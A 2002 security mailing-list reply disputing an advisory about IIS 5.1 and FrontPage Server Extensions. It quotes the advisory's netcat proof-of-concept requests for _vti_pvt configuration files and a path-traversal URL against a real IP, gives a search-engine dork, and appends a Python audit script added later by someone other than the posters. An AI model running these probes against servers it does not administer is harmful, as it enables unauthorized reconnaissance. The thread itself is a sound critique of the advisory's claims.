Re: This is the CORRECTED POST please ignore the one before same subject MULTIPLE Remote Issues with IIS 5.1 on Windows XP

I must clear up some issues on this advisory which is located at 
http://www.safehack.com/Advisory/IIS5webdir.txt as well as a previous 
advisory by the same author, NtWaK0, which is located at 
http://www.safehack.com/Advisory/shtmldump.txt

Normally I wouldn't bother commenting on an advisory like this but 
when it comes to the FrontPage server extensions, vulnerabilities 
often get picked up by others without any verification.  Perhaps this 
is because so few really understand much about FPSE security.

In this commentary I am going to address the specific issues 
mentioned in the original advisory.  My conclusions are based on my 
experience with FPSE security and actual testing on two separate 
Windows XP/IIS 5.1 installations as well as two Windows 2000/IIS 5.0 
installations.  I can provide specific documentation on my tests if 
anyone wishes to validate my research.

The first issue to address is the claim that "_vti_bin/shtml.dll Can 
lead to REMOTE Exploit on IIS 5.1".  In the advisory located at 
http://www.safehack.com/Advisory/shtmldump.txt, the author claims 
that by sending the request GET /_vti_bin/shtml.dll, binary data 
was returned, which incidentally is the binary contents of the 
shtml.dll file.  In other words, a GET request was made for shtml.dll 
and so the server sent the file shtml.dll back to the client.  If 
this request had been made in a normal web browser, the Save As 
dialog box would have popped up, asking where to save shtml.dll.

This situation would occur if the _vti_bin directory did not have 
execute permissions and did have read permissions, which is not the 
case with a default installation.  The author seemed to imply that 
the previous malformed requests that were blocked by URLScan were the 
cause of the binary contents being returned, but did not state 
whether he had tried a successful GET request for shtml.dll before 
submitting those URLs. 

Nevertheless, even if the two malformed requests caused the binary 
contents of shtml.dll to be returned, that would by no means lead to 
a compromise of the system.  Having the remote web site's shtml.dll 
is hardly going to lead to a compromise of a web server.  This is NOT 
a vulnerability, but likely a misconfigured web server.

The next three issues, addressed in the more recent advisory, are 
that certain files in the _vti_pvt directory will reveal information 
about the server.  However, by default, anonymous users do not have 
read or write permissions to the _vti_pvt directory or its contents.  
Even if the permissions were manually changed to allow reading of 
this file, this is an old issue.  Several years ago I had written a 
script for RFP's whisker scanner that was later integrated into the 
main scan.db.  This script snippet is as follows:

# These can be used to learn more about the server
scan () _vti_pvt >> access.cnf
info - Contains HTTP server-specific access control information

scan () _vti_pvt >> service.cnf
info - Contains meta-information about the web

scan () _vti_pvt >> services.cnf
info - Contains the list of subwebs.

scan () _vti_pvt >> writeto.cnf
info - Contains information about form handler result files

scan () _vti_pvt >> svcacl.cnf
info - File used to store whether subwebs have unique permissions settings
info - and any IP address restrictions.  Can be used to discover
info - information about subwebs

Default permissions were later tightened to prevent this information 
leak.  This issue is NOT a vulnerability unless the admin explicitly 
gives anonymous users access to this file.  By default, remote users 
do not have access to these files.  Again, this is a misconfigured 
server.

The final issue is that /iishelp/common/colegal.htm will give access 
to other files.  The author states that the request GET 
/iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf will 
return the contents of the access.cnf file.  The flaw with this is 
that colegal.htm is simply an HTML file with static content.  There 
is some client-side JavaScript for browser support but no server-side 
code or server-side includes that would allow that file to access 
anything else on the system.  In fact, the colegal.htm file is not 
even being accessed in that request.  IIS will parse all of the ../'s 
which will take it to the web root (and ignore the extra ../'s) then 
down to the /_vti_pvt directory.  If NtWaK0 had his friend look at 
his web logs he would see that there was never any request for 
colegal.htm.  This is NOT a vulnerability.

Even if it was vulnerable, since we know that a direct request to 
access.cnf on that misconfigured test server already returns the file 
contents, there is no proof that the colegal.htm request was 
successful.  The proper way to test this is to request a file and get 
an access denied error then repeat the test with the exploit to show 
that the exploit worked. 

In the two advisories I tested, I found nothing that was an actual 
vulnerability.  All of these issues were likely because the test 
server was not configured correctly.  Furthermore, none of these 
issues are specific to IIS 5.1.  Improperly configured FrontPage 
Server Extensions will exhibit this behaviour on any platform.

Advisories such as this without any testing or confirmation by the 
vendor are what give security testers a bad name.  The author says 
that Microsoft was notified but does not mention anything about 
getting any response from them.  Where the author does not even have 
his own copy of IIS for testing, advisories such as these are better 
suited for vuln-dev. All of his tests were performed on a single XP 
system he did not install and therefore had no control over the 
configuration. Unverified vulnerabilities such as these make it 
difficult to sift through the ever-increasing amount of security 
information we are faced with every day.  I do not mean to insult 
this author, I certainly commend him for his effort and creativity, 
but I do feel like this advisory was irresponsible.  Even when I am 
absolutely sure of a security issue and have received confirmation 
from the vendor, I bounce my ideas off other security experts as a 
sanity check before sending anything out to the public.  Hopefully 
NtWaK0 and others will also do so in the future.

One final note is that the author mentions that a search for 
"writeto.cnf" at google.com will return many results.  This statement 
is true.  While not a vulnerability in the FrontPage Server 
Extensions, it is a good indication of how many FrontPage webs are 
not properly secured.  However, keep in mind that many of those sites 
are running old versions of FPSE and many of those directory listings 
are sites that have FPSE disabled but the files were never removed 
from the site. Another more refined search for these servers is to 
search for "Index of /_vti_pvt/" (be sure to include the quotes in 
the search).

sozni
www.xato.net

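As an added example (not part of sozni's message or of the NtWaK0 advisory), a small Python audit that applies the test method sozni describes to a FrontPage web you administer: request each _vti_pvt file directly, expect a denial, then repeat with the advisory's colegal.htm:../ form, and call it a bypass only when the direct request was denied and the variant still returned content. The file list comes from the whisker snippet and the advisory's requests; the traversal resolver's handling of the ':' segment, the HTTP helper and the offline fake server are my own assumptions.

```python
import posixpath
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# _vti_pvt files named in the whisker snippet and in the advisory's requests.
VTI_PVT_FILES = ["access.cnf", "service.cnf", "services.cnf", "writeto.cnf",
                 "svcacl.cnf", "botinfs.cnf", "bots.cnf", "linkinfo.cnf"]
# The request form used in the advisory, with a file name appended.
VARIANT_PREFIX = "/iishelp/common/colegal.htm:../../../../../_vti_pvt/"


def resolve_traversal_tail(request_path):
    # Resolve the '../' chain against the web root. Assumption (mine): the part
    # after the first ':' is what the server walks; '../' above root is dropped.
    tail = request_path.split(":", 1)[1] if ":" in request_path else request_path
    return posixpath.normpath("/" + tail.lstrip("/"))


def classify(direct_status, variant_status):
    # sozni's rule: a bypass is only shown when the direct request was denied
    # and the variant still returned content.
    if direct_status == 200:
        return "misconfigured: direct read allowed, variant proves nothing"
    if variant_status == 200:
        return "bypass: direct read denied but variant returned content"
    return "ok: both requests denied"


def audit(fetch_status, files=VTI_PVT_FILES):
    # fetch_status(path) -> HTTP status code; one verdict per file.
    return {name: classify(fetch_status("/_vti_pvt/" + name),
                           fetch_status(VARIANT_PREFIX + name))
            for name in files}


def http_fetcher(host, port=80):
    # Hypothetical helper for a server you administer; demo() stays offline.
    def fetch(path):
        try:
            with urlopen(Request(f"http://{host}:{port}{path}")) as resp:
                return resp.status
        except HTTPError as err:
            return err.code
    return fetch


def demo():
    # Constructed fake server: access.cnf world-readable, everything else 403.
    fake = lambda path: 200 if path.endswith("access.cnf") else 403
    return audit(fake)
```

Running audit(http_fetcher("your-host")) against your own server gives the same per-file verdicts as demo() produces for the constructed case.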



On Sun, 10 Feb 2002 21:29:36 -0500, Adonis.No.Spam wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>               .---------------.
>              / NtWaK0 Advisory \
>-----------------------------------------------------------------------------
>
>: Affected : Windows XP with IIS 5.1
>: Type     : MULTIPLE Remote Issues
>: Type     : Remote/Local Security Issues
>: Date     : 10-02-2002
>: Author   : NtWaK0 @ www.SafeHack.com
>: Credit   : NtWaK0 @ www.SafeHack.com
>-----------------------------------------------------------------------------
>
>  Remote/Local Exploit
>-----------------------------------------------------------------------------
>
>  Disclaimer                                  * * * www.SafeHack.com * * *
>-----------------------------------------------------------------------------
>
>: This material is presented for informational and entertainment purposes
>: only, and to satisfy the curious. Any activities described in this file
>: which involve vandalism, theft, or any other illegal activities are
>: recounted from third-party conversations. I do not condone or encourage
>: vandalism or theft. I do not accept any liability for anything anyone
>: does with this information. So, don't shoot the messenger.
>: Remember: Use a computer in ways that ensure respect for your fellows.
>
>  T.O.C.
>-----------------------------------------------------------------------------
>
>:    [  Brief History . . . . . . . . . . . . . . . . . . . . . . line  40 ]
>:    [  The Problem . . . . . . . . . . . . . . . . . . . . . . . line  60 ]
>:    [  The Solution  . . . . . . . . . . . . . . . . . . . . . . line 156 ]
>
>  Brief History
>-----------------------------------------------------------------------------
>
>: I had the chance to play for a couple of hours with IIS 5.1 on a friend's
>: box, thanks to Recon. While I was trying some stuff on IIS 5.1 I found MANY
>: problems with the default IIS 5.1 installation and on files installed by
>: default.
>
>: This one is not the same as the one reported earlier. The one reported
>: before had to deal with "GET /_vti_bin/shtml.dll".
>: A copy of it can be found at:
>: http://www.safehack.com/Advisory/shtmldump.txt
>
>: Test OS: Tested on Windows XP with IIS 5.1
>
>: Please continue to read for more details.
>
>  The Problem
>-----------------------------------------------------------------------------
>
>>>> 1- Issue <<<
>
>: Identify WEB DIR installation. By sending this "GET /_vti_pvt/access.cnf"
>: you can identify the web installation. As we all know this is a helpful
>: piece of information if someone is going to attack your web site.
>
>>>> Proof-Of-Concept <<<
>: C:\Tool>nc -v -n 67.82.156.211 81
>: (UNKNOWN) [67.82.156.211] 81 (?) open
>: GET /_vti_pvt/access.cnf
>: vti_encoding:SR|utf8-nl
>: RealmName:LAMER
>: InheritPermissions:false
>: PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt
>
>: There is another security issue with this too. "InheritPermissions:false"
>: This will tell security inheritance of that folder.
>:
>
>>>> 2- Issue <<<
>
>>>> Proof-Of-Concept <<<
>: C:\Tool>nc -v -n 67.82.156.211 81
>: (UNKNOWN) [67.82.156.211] 81 (?) open
>: GET /_vti_pvt/botinfs.cnf
>
>: vti_encoding:SR|utf8-nl
>: D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar
>
>>>> 3- Issue <<<
>
>>>> Proof-Of-Concept <<<
>: C:\Tool>nc -v -n 67.82.156.211 81
>: (UNKNOWN) [67.82.156.211] 81 (?) open
>: GET /_vti_pvt/bots.cnf
>: vti_encoding:SR|utf8-nl
>: vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf
>: vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\fp4Avnb.dll
>
>>>> 4- Issue <<<
>: Using GET /iishelp/common/colegal.htm you can access other files under the
>: web structure. I did not have a chance to test it on files above the web
>: structure. Like I said I do not run IIS 5.1 but a friend does.
>: One of these days I am going to buy more memory for some of my old boxes
>: and slap IIS 5.1 on one to be able to do better tests.
>
>>>> Proof-Of-Concept <<<
>: C:\Tool>nc -v -n 67.82.156.211 81
>: (UNKNOWN) [67.82.156.211] 81 (?) open
>: GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf
>: vti_encoding:SR|utf8-nl
>: RealmName:LAMER
>: InheritPermissions:false
>: PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt
>
>: writeto.cnf [Extracted From]
>: http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp
>
>: Back links for files that can be written to by users of the web, such as
>: Save Results Form handler result files. Files that can be written to by
>: users of the web have a looser security setting than regular web content.
>
>: C:\Tool>nc -v -n 67.82.156.211 81
>: (UNKNOWN) [67.82.156.211] 81 (?) open
>: GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll
>: MZ ... This program cannot be run in DOS mode.
>: [binary PE contents of admin.dll, omitted]
>
>: C:\Tool>nc -v -n 67.82.156.211 81
>: (UNKNOWN) [67.82.156.211] 81 (?) open
>: GET /_vti_pvt/linkinfo.cnf
>: vti_encoding:SR|utf8-nl
>: javascript\:loadhelpfront();:localstart.asp
>: javascript\:activate(<%=iver%>);:localstart.asp
>: http\://www.safehack.com:index.htm
>: /iishelp/common/colegal.htm:localstart.asp
>
>: NOTE: A search on google for "writeto.cnf" returned alarming results:
>: http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta=
>
>
>  The Solution
>-----------------------------------------------------------------------------
>
>: No idea. Vendor was informed.
>: If you are going to use the found issues, credit must be given to the
>: author. NtWaK0 @ www.safehack.com
>-----------------------------------------------------------------------------
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP 7.1
>
>iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV
>w0aAHeJqCi7MoCs62m5AR8dm
>=u7kB
>-----END PGP SIGNATURE-----
>
>
>________________________________________________________________________
>The only secure computer is one that's unplugged, locked in a safe, and
>buried 20 feet under the ground in a secret location... and i'm not even
>too sure about that one"--Dennis Huges, FBI.
>
>________________________________________________________________________
>Live Well Do Good  www.SafeHack.com          | Je Pense, Donc Je Suis
>I know I ain't perfect, but i'm 99 point 9 percent :)
>RFCs are meant to be read and followed…:)
>NtWaK0
>________________________________________________________________________
>Connect yourself to the main computer and let me take you to a cybernetic
>ride. Are you connected to the right cybernet? If you are, finally you are
>connected to my brain.
>
>________________________________________________________________________
>-=- Use a computer in ways that ensure respect for your fellows -=-
>
>





